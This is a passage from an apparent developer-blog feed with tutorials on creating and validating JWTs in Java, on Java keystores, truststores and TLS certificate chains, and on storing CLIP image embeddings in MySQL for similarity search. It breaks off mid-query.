class="nc">String</span> <span class="n">subject</span><span class="o">,</span> <span class="nc">String</span> <span class="n">secretKey</span><span class="o">)</span> <span class="o">{</span> <span class="c1">// Define the key from the secret string</span> <span class="c1">// The key should be securely managed and stored</span> <span class="nc">Key</span> <span class="n">key</span> <span class="o">=</span> <span class="nc">Keys</span><span class="o">.</span><span class="na">hmacShaKeyFor</span><span class="o">(</span><span class="n">secretKey</span><span class="o">.</span><span class="na">getBytes</span><span class="o">(</span><span class="nc">StandardCharsets</span><span class="o">.</span><span class="na">UTF_8</span><span class="o">));</span> <span class="nc">Instant</span> <span class="n">now</span> <span class="o">=</span> <span class="nc">Instant</span><span class="o">.</span><span class="na">now</span><span class="o">();</span> <span class="c1">// Build the JWT</span> <span class="nc">String</span> <span class="n">jwt</span> <span class="o">=</span> <span class="nc">Jwts</span><span class="o">.</span><span class="na">builder</span><span class="o">()</span> <span class="o">.</span><span class="na">setIssuer</span><span class="o">(</span><span class="n">issuer</span><span class="o">)</span> <span class="c1">// Set the issuer claim</span> <span class="o">.</span><span class="na">setSubject</span><span class="o">(</span><span class="n">subject</span><span class="o">)</span> <span class="c1">// Set the subject claim</span> <span class="o">.</span><span class="na">setIssuedAt</span><span class="o">(</span><span class="nc">Date</span><span class="o">.</span><span class="na">from</span><span class="o">(</span><span class="n">now</span><span class="o">))</span> <span class="c1">// Set the issued at time</span> <span class="o">.</span><span class="na">setExpiration</span><span class="o">(</span><span class="nc">Date</span><span class="o">.</span><span class="na">from</span><span class="o">(</span><span class="n">now</span><span class="o">.</span><span class="na">plus</span><span class="o">(</span><span class="mi">5L</span><span class="o">,</span> <span class="nc">ChronoUnit</span><span class="o">.</span><span class="na">MINUTES</span><span class="o">)))</span> <span class="c1">// Set expiration for 5 minutes later</span> <span class="o">.</span><span class="na">setId</span><span class="o">(</span><span class="no">UUID</span><span class="o">.</span><span class="na">randomUUID</span><span class="o">().</span><span class="na">toString</span><span class="o">())</span> <span class="c1">// Set a unique ID for the token</span> <span class="o">.</span><span class="na">signWith</span><span class="o">(</span><span class="n">key</span><span class="o">)</span> <span class="c1">// Sign the JWT with the key</span> <span class="o">.</span><span class="na">compact</span><span class="o">();</span> <span class="c1">// Compacts the JWT into its final string form</span> <span class="k">return</span> <span class="n">jwt</span><span class="o">;</span> <span class="o">}</span> <span class="kd">public</span> <span class="kd">static</span> <span class="kt">void</span> <span class="nf">main</span><span class="o">(</span><span class="nc">String</span><span class="o">[]</span> <span class="n">args</span><span class="o">)</span> <span class="o">{</span> <span class="c1">// Example usage: replace with your actual values</span> <span class="nc">String</span> <span class="n">myIssuer</span> <span class="o">=</span> <span class="s">"my.company.com"</span><span class="o">;</span> <span class="nc">String</span> <span class="n">mySubject</span> <span class="o">=</span> <span class="s">"john.doe"</span><span class="o">;</span> <span class="c1">// Key must be sufficiently long for HS256 (e.g., 32 characters or more for 256 bits)</span> <span class="nc">String</span> <span class="n">mySecretKey</span> <span class="o">=</span> <span class="s">"aVerySecureAndLongSecretKeyForSigningJwts"</span><span class="o">;</span> <span class="nc">String</span> <span class="n">token</span> <span class="o">=</span> <span class="n">generateJwtToken</span><span class="o">(</span><span class="n">myIssuer</span><span class="o">,</span> <span class="n">mySubject</span><span class="o">,</span> <span class="n">mySecretKey</span><span class="o">);</span> <span class="nc">System</span><span class="o">.</span><span class="na">out</span><span class="o">.</span><span class="na">println</span><span class="o">(</span><span class="s">"Generated JWT Token:"</span><span class="o">);</span> <span class="nc">System</span><span class="o">.</span><span class="na">out</span><span class="o">.</span><span class="na">println</span><span class="o">(</span><span class="n">token</span><span class="o">);</span> <span class="o">}</span> <span class="o">}</span> </code></pre> </div> <p>The above code will create the token. </p> <p>Validating JWT in Java<br> Example Code<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight java"><code><span class="kn">package</span> <span class="nn">jwt</span><span class="o">;</span> <span class="kn">import</span> <span class="nn">io.jsonwebtoken.Claims</span><span class="o">;</span> <span class="kn">import</span> <span class="nn">io.jsonwebtoken.Jwts</span><span class="o">;</span> <span class="kn">import</span> <span class="nn">io.jsonwebtoken.security.Keys</span><span class="o">;</span> <span class="kn">import</span> <span class="nn">java.nio.charset.StandardCharsets</span><span class="o">;</span> <span class="kd">public</span> <span class="kd">class</span> <span class="nc">JWTValidation</span> <span class="o">{</span> <span class="kd">private</span> <span class="kd">static</span> <span class="kd">final</span> <span class="nc">String</span> <span class="no">SECRET_KEY</span> <span class="o">=</span> <span class="s">"aVerySecureAndLongSecretKeyForSigningJwts"</span><span class="o">;</span> <span class="kd">public</span> <span class="kd">static</span> <span class="nc">Claims</span> <span class="nf">validate</span><span class="o">(</span><span class="nc">String</span> <span class="n">token</span><span class="o">)</span> <span class="o">{</span> <span class="k">return</span> <span class="nc">Jwts</span><span class="o">.</span><span class="na">parser</span><span class="o">().</span><span class="na">verifyWith</span><span class="o">(</span><span class="nc">Keys</span><span class="o">.</span><span class="na">hmacShaKeyFor</span><span class="o">(</span><span class="no">SECRET_KEY</span><span class="o">.</span><span class="na">getBytes</span><span class="o">(</span><span class="nc">StandardCharsets</span><span class="o">.</span><span class="na">UTF_8</span><span class="o">))).</span><span class="na">build</span><span class="o">().</span><span class="na">parseSignedClaims</span><span class="o">(</span><span class="n">token</span><span class="o">).</span><span class="na">getPayload</span><span class="o">();</span> <span class="o">}</span> <span class="kd">public</span> <span class="kd">static</span> <span class="kt">void</span> <span class="nf">main</span><span class="o">(</span><span class="nc">String</span><span class="o">[]</span> <span class="n">args</span><span class="o">)</span> <span class="o">{</span> <span class="k">if</span> <span class="o">(</span><span class="n">args</span><span class="o">.</span><span class="na">length</span> <span class="o">&lt;</span> <span class="mi">1</span> <span class="o">)</span> <span class="o">{</span> <span class="nc">System</span><span class="o">.</span><span class="na">out</span><span class="o">.</span><span class="na">println</span><span class="o">(</span><span class="s">"Please provide the token String as a parameter"</span><span class="o">);</span> <span class="k">return</span><span class="o">;</span> <span class="o">}</span> <span class="nc">String</span> <span class="n">tokenString</span> <span class="o">=</span> <span class="n">args</span><span class="o">[</span><span class="mi">0</span><span class="o">];</span> <span class="nc">Claims</span> <span class="n">claims</span> <span class="o">=</span> <span class="n">validate</span> <span class="o">(</span><span class="n">tokenString</span><span class="o">);</span> <span class="nc">System</span><span class="o">.</span><span class="na">out</span><span class="o">.</span><span class="na">println</span><span class="o">(</span><span class="s">"Subject: "</span> <span class="o">+</span> <span class="n">claims</span><span class="o">.</span><span class="na">getSubject</span><span class="o">());</span> <span class="nc">System</span><span class="o">.</span><span class="na">out</span><span class="o">.</span><span class="na">println</span><span class="o">(</span><span class="s">"Issuer: "</span> <span class="o">+</span> <span class="n">claims</span><span class="o">.</span><span class="na">getIssuer</span><span class="o">());</span> <span class="nc">System</span><span class="o">.</span><span class="na">out</span><span class="o">.</span><span class="na">println</span><span class="o">(</span><span class="s">"Issued At: "</span> <span class="o">+</span> <span class="n">claims</span><span class="o">.</span><span class="na">getIssuedAt</span><span class="o">());</span> <span class="nc">System</span><span class="o">.</span><span class="na">out</span><span class="o">.</span><span class="na">println</span><span class="o">(</span><span class="s">"Expiration: "</span> <span class="o">+</span> <span class="n">claims</span><span class="o">.</span><span class="na">getExpiration</span><span class="o">());</span> <span class="nc">System</span><span class="o">.</span><span class="na">out</span><span class="o">.</span><span class="na">println</span><span class="o">(</span><span class="s">"ID: "</span> <span class="o">+</span> <span class="n">claims</span><span class="o">.</span><span class="na">getId</span><span class="o">());</span> <span class="nc">System</span><span class="o">.</span><span class="na">out</span><span class="o">.</span><span class="na">println</span><span class="o">(</span><span class="s">"Audience: "</span> <span class="o">+</span> <span class="n">claims</span><span class="o">.</span><span class="na">getAudience</span><span class="o">());</span> <span class="o">}</span> <span class="o">}</span> </code></pre> </div> <p>By running the above code you can pass the generated token to test the validity. </p> <p>Decoding JWT <br> Java Example<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight java"><code><span class="kn">package</span> <span class="nn">jwt</span><span class="o">;</span> <span class="kn">import</span> <span class="nn">java.nio.charset.StandardCharsets</span><span class="o">;</span> <span class="kn">import</span> <span class="nn">java.util.Base64</span><span class="o">;</span> <span class="kd">public</span> <span class="kd">class</span> <span class="nc">JWTTokenDecoder</span> <span class="o">{</span> <span class="kd">public</span> <span class="kd">static</span> <span class="kt">void</span> <span class="nf">decodeJWT</span><span class="o">(</span><span class="nc">String</span> <span class="n">token</span><span class="o">)</span> <span class="o">{</span> <span class="nc">String</span><span class="o">[]</span> <span class="n">parts</span> <span class="o">=</span> <span class="n">token</span><span class="o">.</span><span class="na">split</span><span class="o">(</span><span class="s">"\\."</span><span class="o">);</span> <span class="k">if</span> <span class="o">(</span><span class="n">parts</span><span class="o">.</span><span class="na">length</span> <span class="o">!=</span> <span class="mi">3</span><span class="o">)</span> <span class="o">{</span> <span class="k">throw</span> <span class="k">new</span> <span class="nf">IllegalArgumentException</span><span class="o">(</span><span class="s">"Invalid JWT token format"</span><span class="o">);</span> <span class="o">}</span> <span class="nc">Base64</span><span class="o">.</span><span class="na">Decoder</span> <span class="n">decoder</span> <span class="o">=</span> <span class="nc">Base64</span><span class="o">.</span><span class="na">getUrlDecoder</span><span class="o">();</span> <span class="c1">// Decode Header</span> <span class="nc">String</span> <span class="n">header</span> <span class="o">=</span> <span class="k">new</span> <span class="nc">String</span><span class="o">(</span><span class="n">decoder</span><span class="o">.</span><span class="na">decode</span><span class="o">(</span><span class="n">parts</span><span class="o">[</span><span class="mi">0</span><span class="o">]),</span> <span class="nc">StandardCharsets</span><span class="o">.</span><span class="na">UTF_8</span><span class="o">);</span> <span class="nc">System</span><span class="o">.</span><span class="na">out</span><span class="o">.</span><span class="na">println</span><span class="o">(</span><span class="s">"JWT Header: "</span> <span class="o">+</span> <span class="n">header</span><span class="o">);</span> <span class="c1">// Decode Payload (Body)</span> <span class="nc">String</span> <span class="n">payload</span> <span class="o">=</span> <span class="k">new</span> <span class="nc">String</span><span class="o">(</span><span class="n">decoder</span><span class="o">.</span><span class="na">decode</span><span class="o">(</span><span class="n">parts</span><span class="o">[</span><span class="mi">1</span><span class="o">]),</span> <span class="nc">StandardCharsets</span><span class="o">.</span><span class="na">UTF_8</span><span class="o">);</span> <span class="nc">System</span><span class="o">.</span><span class="na">out</span><span class="o">.</span><span class="na">println</span><span class="o">(</span><span class="s">"JWT Body: "</span> <span class="o">+</span> <span class="n">payload</span><span class="o">);</span> <span class="c1">// The signature part (parts[2]) is a hash and cannot be "decoded" into a readable string in the same way.</span> <span class="c1">// It's used for signature verification.</span> <span class="o">}</span> <span class="kd">public</span> <span class="kd">static</span> <span class="kt">void</span> <span class="nf">main</span><span class="o">(</span><span class="nc">String</span><span class="o">[]</span> <span class="n">args</span><span class="o">)</span> <span class="o">{</span> <span class="k">if</span> <span class="o">(</span><span class="n">args</span><span class="o">.</span><span class="na">length</span> <span class="o">&lt;</span> <span class="mi">1</span> <span class="o">)</span> <span class="o">{</span> <span class="nc">System</span><span class="o">.</span><span class="na">out</span><span class="o">.</span><span class="na">println</span><span class="o">(</span><span class="s">"Please provide the token String as a parameter"</span><span class="o">);</span> <span class="k">return</span><span class="o">;</span> <span class="o">}</span> <span class="nc">String</span> <span class="n">jwtToken</span> <span class="o">=</span> <span class="n">args</span><span class="o">[</span><span class="mi">0</span><span class="o">];</span> <span class="n">decodeJWT</span><span class="o">(</span><span class="n">jwtToken</span><span class="o">);</span> <span class="o">}</span> <span class="o">}</span> </code></pre> </div> <p>You can pass the JWT and get the decoded value</p> <h2> JWT Encryption vs Signing </h2> <p>Many developers confuse signing and encryption.<br> Signing ensures:<br> • Token integrity<br> • Token authenticity</p> <p>Encryption ensures:<br> • Token confidentiality</p> <p>Most JWT tokens are <strong>signed but not encrypted</strong>.</p> <h2> Security Best Practices </h2> <p>When using JWT in production:</p> <ul> <li>Never store sensitive data in payload</li> <li>Always use HTTPS</li> <li>Set token expiration (exp claim) Refer: <a href="https://javadoc.io/doc/io.jsonwebtoken/jjwt-api/0.11.2/io/jsonwebtoken/Claims.html" rel="noopener noreferrer">Claims </a>, <a href="https://javadoc.io/static/io.jsonwebtoken/jjwt-api/0.11.2/io/jsonwebtoken/Claims.html#setExpiration(java.util.Date)" rel="noopener noreferrer">setExpiration</a> </li> <li>Rotate secret keys periodically</li> <li>Validate token signature on every request</li> </ul> <h2> When Should You Use JWT? </h2> <p>JWT works well when:</p> <ul> <li>Building stateless APIs</li> <li>Implementing microservices authentication</li> <li>Creating Single Sign-On systems</li> <li>Protecting REST APIs</li> </ul> <h2> Source Code </h2> <p>All source files are available on GitHub:<br> <a href="https://github.com/knowledgebase21st/Software-Engineering/tree/dev/security/JWT" rel="noopener noreferrer">Github source codes</a></p> <h2> Conclusion </h2> <p>JWT provides a simple and secure way to transmit claims between systems.</p> <p>Understanding how JWT works internally, including header, payload, and signature is important when implementing authentication systems in modern applications.</p> <p>By using proper signing, validation, and expiration strategies, JWT can be a powerful tool for secure API authentication.</p> java security jwt authentication Keystore vs Truststore — How SSL Certificate Chain Actually Works (with java Examples) Sanjay Ghosh Sun, 15 Mar 2026 20:18:35 +0000 https://dev.to/sanjayghosh/keystore-vs-truststore-how-ssl-certificate-chain-actually-works-with-java-examples-3hj5 https://dev.to/sanjayghosh/keystore-vs-truststore-how-ssl-certificate-chain-actually-works-with-java-examples-3hj5 <p>When you see the 🔒 HTTPS lock icon in your browser, something important has already happened behind the scenes.</p> <p>Your browser has verified:</p> <ul> <li>The identity of the server</li> <li>The certificate chain</li> <li>The trusted Certificate Authority</li> </ul> <p>But where are these certificates stored?<br> And how does the verification actually work?</p> <p>This is where Keystore and Truststore come in.</p> <p>In this article we will cover:</p> <ul> <li>What a Keystore is</li> <li>What a Truststore is</li> <li>How the certificate chain works</li> <li>How they are used during the TLS handshake</li> <li>Examples using keytool</li> <li>Common SSL handshake errors</li> <li>A quick look at Mutual TLS (mTLS) (two-way TLS (or two-way SSL) </li> </ul> <h2> 🧾 Certificate Creation Flow </h2> <p>Before talking about keystore and truststore, let's see how a certificate is created.</p> <ol> <li>The server generates a public/private key pair.</li> <li>It creates a CSR (Certificate Signing Request).</li> <li>The CSR is sent to a Certificate Authority (CA).</li> <li>The CA verifies the identity of the organization.</li> <li>The CA issues a leaf certificate.</li> <li>The certificate is signed by an Intermediate CA.</li> <li>The intermediate CA is signed by a Root CA.</li> </ol> <p>This produces a certificate chain.<br> Example chain:</p> <p><code>Root CA<br> ↓<br> Intermediate CA 1<br> ↓<br> Intermediate CA 2<br> ↓<br> Leaf Certificate (Server Certificate)</code><br> Each certificate is digitally signed by the one above it.</p> <h2> 🏪 What is a Truststore? </h2> <p>A Truststore is a secure repository that contains certificates from trusted entities.</p> <p>These certificates are used to verify the identity of remote systems during secure communication.</p> <p>A truststore typically contains:</p> <h3> Trusted Root Certificates </h3> <p>These are:</p> <ul> <li>Self-signed certificates</li> <li>Issued by trusted Certificate Authorities</li> <li>Preinstalled in operating systems, browsers, or Java runtimes</li> </ul> <h3> Intermediate CA Certificates </h3> <p>Intermediate certificates help bridge the chain of trust between a root CA and the server certificate.</p> <h3> 🎯 Purpose of Truststore </h3> <p>The truststore is used to validate certificates presented by other parties.</p> <p>Example:<br> When a browser connects to:<br> <code>https://myserver.com</code></p> <p>The browser:</p> <ol> <li>Receives the server’s certificate</li> <li>Builds the certificate chain</li> <li>Verifies the chain up to a trusted root certificate in its truststore</li> </ol> <p>If the verification succeeds, the connection is trusted.<br> If not, the browser displays a certificate warning.</p> <h2> 🔑 What is a Keystore? </h2> <p>A Keystore is a secure repository that stores your own cryptographic identity.</p> <p>It usually contains:</p> <ul> <li>Server private key</li> <li>Server leaf certificate</li> <li>Sometimes intermediate certificates</li> </ul> <p><code>Note: The private key stored in the keystore corresponds to the leaf certificate of the server.</code></p> <p>The private key is used during the TLS handshake to <strong>prove ownership of the certificate</strong>.<br> It must <strong>never be shared</strong>.</p> <h2> 🔄 How Keystore and Truststore Work Together </h2> <p>During the TLS handshake:</p> <h4> Step 1 — Client connects to server </h4> <p>The client initiates a secure connection.</p> <h4> Step 2 — Server sends certificate chain </h4> <p>The server sends:<br> <code>Leaf Certificate<br> Intermediate Certificates</code></p> <h4> Step 3 — Client validates the chain </h4> <p>The client verifies:<br> <code>Leaf Certificate<br> ↓<br> Intermediate Certificate<br> ↓<br> Root CA</code><br> The <strong>root CA must exist in the client's truststore</strong>.</p> <h4> Step 4 — Secure connection established </h4> <p>If the certificate chain is valid and trusted, the TLS session is established.</p> <h2> ☕ Java Example — Keystore </h2> <p>In Java applications, keystores are commonly stored as:<br> <code>.jks<br> .p12</code></p> <h4> Create a Keystore </h4> <p><code>keytool -genkeypair \<br> -alias myserver \<br> -keyalg RSA \<br> -keysize 2048 \<br> -keystore keystore.jks</code></p> <p>This above command generates:</p> <ul> <li>A private key</li> <li>A self-signed certificate</li> </ul> <h4> View Keystore Contents </h4> <p><code>keytool -list -v -keystore keystore.jks</code><br> Example output:<br> <code>Alias name: myserver<br> Entry type: PrivateKeyEntry<br> Certificate chain length: 1</code></p> <h2> ☕ Java Example — Truststore </h2> <p>Java provides a default truststore which is:<br> <code>$JAVA_HOME/lib/security/cacerts</code><br> Default password:<br> <code>changeit</code><br> List certificates in the truststore:<br> <code>keytool -list -keystore $JAVA_HOME/lib/security/cacerts</code><br> This truststore contains <strong>nearly two hundred trusted CA certificates</strong>.</p> <h3> Import Certificate into a Truststore </h3> <p>When the certificate is trusted by the Truststore<br> Example<br> <code>keytool -importcert \<br> -alias myserver \<br> -file server.crt \<br> -keystore truststore.jks</code></p> <h2> ⚠️ SSL Handshake Errors Related to Certificate Issues </h2> <p>Many SSL handshake failures occur because of certificate chain or trust problems.<br> Here are some of the most common errors.</p> <h4> SSL Handshake Failed / Error 525 </h4> <p>This indicates that the <strong>client and server failed to establish a secure connection</strong>.<br> A common cause is an <strong>incomplete certificate chain</strong>, where the server does not send the required intermediate certificates.</p> <h4> Certificate Unknown (Java / JSSE) </h4> <p>In Java applications, you may see errors such as:<br> <code>javax.net.ssl.SSLHandshakeException:<br> PKIX path building failed</code><br> This means the client <strong>cannot verify the certificate chain</strong>, usually because the issuing CA is <strong>not present in the truststore</strong>.</p> <h4> ERR_CERT_AUTHORITY_INVALID (Browser) </h4> <p>Browsers show this error when:</p> <ul> <li>The root CA is not trusted</li> <li>The intermediate certificate is missing</li> <li><p>The certificate is self-signed<br> <strong>The certificate chain was issued by an authority that is not trusted</strong><br> This error commonly appears in:</p></li> <li><p>SQL Server connections</p></li> <li><p>Internal client-server applications<br> It occurs when the <strong>client cannot recognize the certificate authority that signed the server certificate</strong>.</p></li> </ul> <h4> SSL error: 0x8009001a (SChannel) </h4> <p>In Windows systems using SChannel, this error usually indicates:</p> <ul> <li>An invalid certificate</li> <li>A broken certificate chain</li> <li>A trust validation failure</li> </ul> <h4> Key Takeaway </h4> <p>Most SSL handshake errors occur because:</p> <ul> <li>The client truststore does not trust the CA</li> <li>The server did not send the full certificate chain</li> <li>The certificate has expired or is invalid Understanding keystore and truststore helps quickly diagnose these issues.</li> </ul> <h2> 🔐 Mutual TLS (mTLS) (Or two-way TLS (or two-way SSL) </h2> <p>In standard TLS:<br> <code>Client verifies Server</code><br> In Mutual TLS (mTLS):<br> <code>Client verifies Server<br> Server verifies Client</code></p> <p>Both sides present certificates.<br> Flow:</p> <ol> <li>Client connects to server</li> <li>Server presents its certificate</li> <li>Client verifies it using its truststore</li> <li>Server requests client certificate</li> <li>Client sends its certificate</li> <li>Server verifies it using its truststore mTLS is commonly used in:</li> </ol> <ul> <li>Microservices architectures</li> <li>Banking systems</li> <li>Internal APIs</li> <li>Zero-trust security environments</li> </ul> <h2> 🧠 Summary </h2> <p><strong>Keystore:</strong> Stores private keys and certificates used to prove identity<br> <strong>Truststore:</strong> Stores trusted CA certificates used to verify others<br> <strong>Certificate Chain:</strong> Establishes trust from server certificate to a trusted root CA</p> <p>Every secure TLS connection depends on this chain of trust.</p> <h2> 📌 Final Thought </h2> <p>Next time you see the 🔒 lock icon in your browser, remember:<br> Behind that simple symbol is a complex system involving:</p> <ul> <li>certificate chains</li> <li>keystores</li> <li>truststores</li> <li>certificate authorities</li> </ul> <p>—all working together to ensure secure communication.</p> truststore keystore tls keytool From Image to Vector: Building Image Similarity Search with Python and MySQL Sanjay Ghosh Sun, 08 Mar 2026 19:24:17 +0000 https://dev.to/sanjayghosh/from-image-to-vector-building-image-similarity-search-with-python-and-mysql-kol https://dev.to/sanjayghosh/from-image-to-vector-building-image-similarity-search-with-python-and-mysql-kol <p>Modern applications increasingly rely on vector embeddings to search and compare data such as text, images, and audio.<br> For example:</p> <ul> <li>finding visually similar images</li> <li>semantic document search</li> <li>recommendation systems</li> </ul> <p>In this article we will:</p> <ul> <li>Convert an <strong>image to a vector embedding</strong> </li> <li>Store the vector in <strong>MySQL</strong> </li> <li>Compare images using <strong>vector similarity</strong> </li> </ul> <p>Stacks used:</p> <ul> <li>Python</li> <li>sentence-transformers</li> <li>PyTorch</li> <li>MySQL vector support</li> </ul> <h2> Final Result </h2> <p>After storing the vectors in MySQL we can run a similarity query.<br> Example output:<br> <code>+------------+-------------+<br> | image_name | similarity |<br> +------------+-------------+<br> | img/t3.jpg | 1.00 |<br> | img/t2.jpg | 0.96 |<br> | img/t1.jpg | 0.96 |<br> | img/t4.jpg | 0.92 |<br> </code></p> <h2> System Architecture </h2> <p>The overall pipeline is simple:</p> <ul> <li>An image is processed by a multimodal embedding model</li> <li>The model converts the image into a numerical vector</li> <li>The vector is stored in MySQL</li> <li>SQL queries compute similarity between vectors</li> </ul> <p><strong>AI → ML → DL → Neural Networks → LLM</strong></p> <p>Let’s briefly explain each level.</p> <h3> Artificial Intelligence (AI) </h3> <p>Artificial Intelligence refers to systems designed to simulate aspects of human intelligence, such as:</p> <ul> <li>learning</li> <li>reasoning</li> <li>decision making</li> <li>problem solving</li> </ul> <p>Early AI systems (often called Good Old-Fashioned AI) did not involve learning. They relied on predefined rules.</p> <p><em>Example:<br> IF humidity &gt; 60% THEN alert</em></p> <h3> Machine Learning (ML) </h3> <p>Machine Learning is a subset of AI where systems learn patterns from data rather than being explicitly programmed.</p> <p>There are three main types of machine learning:</p> <h4> Supervised Learning </h4> <p>Uses labeled data, where each input has a known correct output.<br> <em>Example: Predicting house prices.<br> Inputs: house size, location<br> Output: predicted price</em></p> <h4> Unsupervised Learning </h4> <p>The data is not labeled. The system tries to discover patterns or structure in the data on its own.<br> <em>Example:<br> Customer purchase behavior analysis.<br> For instance, the system might detect that customers who buy Product P1 often also buy Product P2.</em></p> <h4> Reinforcement Learning </h4> <p>Works through interaction with an environment using a reward/penalty mechanism.<br> The system learns through trial and error, continuously improving its decisions based on feedback.<br> An agent interacts with the environment repeatedly to achieve the optimal outcome.</p> <h3> Deep Learning (DL) </h3> <p>Deep Learning is a subset of Machine Learning.<br> It uses multi-layer neural networks to learn complex patterns in large datasets.<br> Deep learning is especially powerful for:</p> <ul> <li>images</li> <li>speech</li> <li>language processing</li> </ul> <h3> Neural Networks (NN) </h3> <p>Neural Networks are the core architecture used in deep learning.<br> They consist of nodes (neurons) organized into layers:</p> <ul> <li>Input layer</li> <li>Hidden layers</li> <li>Output layer</li> </ul> <p>Each neuron performs a mathematical operation based on the following equation:<br> y = Σ (xi * wi) + b<br> Where:</p> <ul> <li>xi = input value</li> <li>wi = weight (importance of the input)</li> <li>b = bias (a learnable scalar parameter)</li> <li>y = output</li> </ul> <p>Data flows through the network in a feed-forward manner, and the network learns by adjusting weights during training.</p> <p>Types of Neural Networks</p> <ol> <li><p>Artificial Neural Networks (ANN)<br> Basic layered neural networks where information flows in one direction.</p></li> <li><p>Convolutional Neural Networks (CNN)<br> Designed for image data. CNNs extract spatial features such as:<br> edges<br> textures<br> shapes</p></li> <li><p>Recurrent Neural Networks (RNN)<br> These networks contain loops and can remember previous inputs. They are commonly used for sequence data such as text or speech.</p></li> </ol> <h3> Large Language Models (LLM) </h3> <p>Large Language Models are a type of deep learning model trained on massive text datasets.</p> <p>They are capable of:</p> <ul> <li>understanding language</li> <li>generating human-like text</li> <li>producing embeddings for semantic similarity</li> </ul> <h2> Process Overview with practical example </h2> <ol> <li>Convert an image to a vector embedding</li> <li>Store the vector in MySQL (version 9.0 or later)</li> <li>Run queries to compare vectors</li> <li>Identify which images are most similar</li> </ol> <h2> Environment Setup </h2> <h3> Create a Python Virtual Environment </h3> <p>Install the virtual environment package:<br> <code>sudo apt install python3.12-venv<br> </code><br> Create the environment:<br> <code>python3 -m venv venv</code></p> <p>Activate it<br> Linux/macOS<br> <code>source venv/bin/activate<br> </code><br> Windows<br> <code>venv\Scripts\activate<br> </code></p> <h3> Install Required Libraries </h3> <p><code>pip install sentence-transformers pillow torch</code></p> <h2> Create the MySQL Table </h2> <p>Create a table with a vector column (createtable.sql).<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code> /*This SQL is to create the table with Vector , MySQL Version 9.6.0 *The size of the Vector is set to (512) , * The INSERT statement has 512 floating point number * and this is the correct match for Common Model Source - CLIP / Truncated OpenAI */ CREATE TABLE image_embeddings ( id INT PRIMARY KEY AUTO_INCREMENT, image_name VARCHAR(255), embedding VECTOR(512) -- Example for a 512-dimensional float vector ); </code></pre> </div> <h2> Python Script: Convert Image to Vector </h2> <p>Write a Python script to convert images into vectors.<br> (transformer_image-to-vector.py)<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>import glob import sys import os # Test it! if len(sys.argv) &gt; 2: imageDir = sys.argv[1] sqlFilePath = sys.argv[2] if os.path.exists(sqlFilePath): os.remove(sqlFilePath) else: print("Usage: python3 transformer_image-to-vector.py &lt;image directory&gt; &lt;path of the output sql") sys.exit(); from sentence_transformers import SentenceTransformer from PIL import Image import json # 1. Load the CLIP model (this is the modern equivalent of imgbeddings) # It downloads about 600MB on the first run. model = SentenceTransformer('clip-ViT-B-32') #This is the Function to generate the sql from the image and write to a desired file def get_sql_insert(image_path,file_path_to_write): try: print("Will write the image {} to file: {}".format(image_path,file_path_to_write)) # 2. Load and process the image img = Image.open(image_path) # 3. Generate the vector (embedding) # We use .tolist() to turn the math array into a Python list embedding = model.encode(img).tolist() # 4. Format the list as a string for SQL [0.1, 0.2, ...] vector_string = json.dumps(embedding) # 5. Create the SQL command sql = "--This sql is genrated from the image using the model SentenceTransformer('clip-ViT-B-32')\n" sql = sql + f"INSERT INTO image_embeddings (image_name, embedding) VALUES ('{image_path}', STRING_TO_VECTOR('{vector_string}'));\n" with open(file_path_to_write, "a") as file: file.write(sql) return ("Successfully Wrote the image {} to file: {}".format(image_path,file_path_to_write)) except Exception as e: return f"Error: {e}" #It will take all the .jpg files from the image directory (First parameter of this python script) #and write to the desired file (2nd parameter of this python script) for lst in glob.glob(f"{imageDir}/*.jpg"): print(get_sql_insert(lst,sqlFilePath)) </code></pre> </div> <p>Usage:<br> <code>python3 transformer_image-to-vector.py &lt;image_directory&gt; &lt;output_sql_file&gt;</code><br> The script generates SQL statements that insert vectors into the MySQL table. Run the output SQL file to store the vectors in MySQL Database.</p> <h2> Comparing Image Vectors </h2> <p>Once the vectors are stored, we can compare them using vector similarity.<br> At the moment, some MySQL vector functions are still evolving.<br> For example, direct usage of VECTOR_DISTANCE() may have limitations in certain versions (9.60).<br> So we implement custom helper functions.</p> <h2> Custom MySQL Functions </h2> <p>Two helper functions are created:</p> <p>my_dot_product(vector, vector)<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>DELIMITER // CREATE FUNCTION my_dot_product(v1 VECTOR, v2 VECTOR) RETURNS FLOAT DETERMINISTIC BEGIN DECLARE total FLOAT DEFAULT 0; DECLARE i INT DEFAULT 0; DECLARE dim INT; -- Convert Vector to String, then to JSON DECLARE j1 JSON DEFAULT CAST(VECTOR_TO_STRING(v1) AS JSON); DECLARE j2 JSON DEFAULT CAST(VECTOR_TO_STRING(v2) AS JSON); SET dim = JSON_LENGTH(j1); WHILE i &lt; dim DO SET total = total + (JSON_EXTRACT(j1, CONCAT('$[', i, ']')) * JSON_EXTRACT(j2, CONCAT('$[', i, ']'))); SET i = i + 1; END WHILE; RETURN total; END // DELIMITER ; </code></pre> </div> <p>my_vec_norm(vector)<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>DELIMITER // CREATE FUNCTION my_vec_norm(v VECTOR) RETURNS FLOAT DETERMINISTIC BEGIN DECLARE total FLOAT DEFAULT 0; DECLARE i INT DEFAULT 0; DECLARE dim INT; DECLARE j JSON DEFAULT CAST(VECTOR_TO_STRING(v) AS JSON); DECLARE val FLOAT; SET dim = JSON_LENGTH(j); WHILE i &lt; dim DO SET val = JSON_EXTRACT(j, CONCAT('$[', i, ']')); SET total = total + (val * val); SET i = i + 1; END WHILE; RETURN SQRT(total); END // DELIMITER ; </code></pre> </div> <p>These functions allow us to compute cosine similarity between vectors.</p> <h2> Querying Image Similarity </h2> <p>Now we run a query to compare stored images against a target image.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>SET @target = STRING_TO_VECTOR('[0.07557862997055054, 0.3899604380130768, -0.149032324552536, 0.06481198966503143, 0.17365998029708862, 0.1696033775806427, -0.009633079171180725, 0.026114463806152344, 0.13283401727676392, -0.048670023679733276, 0.2853511571884155, -0.47713860869407654, 0.3193468451499939, -0.4782599210739136, 0.19979414343833923, -0.4020282030105591, -0.17893710732460022, -0.16028517484664917, 0.11166025698184967, -0.4441247880458832, 0.0721852108836174, -0.015377134084701538, 0.06420326232910156, -0.5317407846450806, 0.011108562350273132, 0.7078717350959778, -0.15541546046733856, 0.06636792421340942, -0.1235189437866211, 0.17564985156059265, -0.2749885618686676, -0.021165557205677032, 0.24020248651504517, 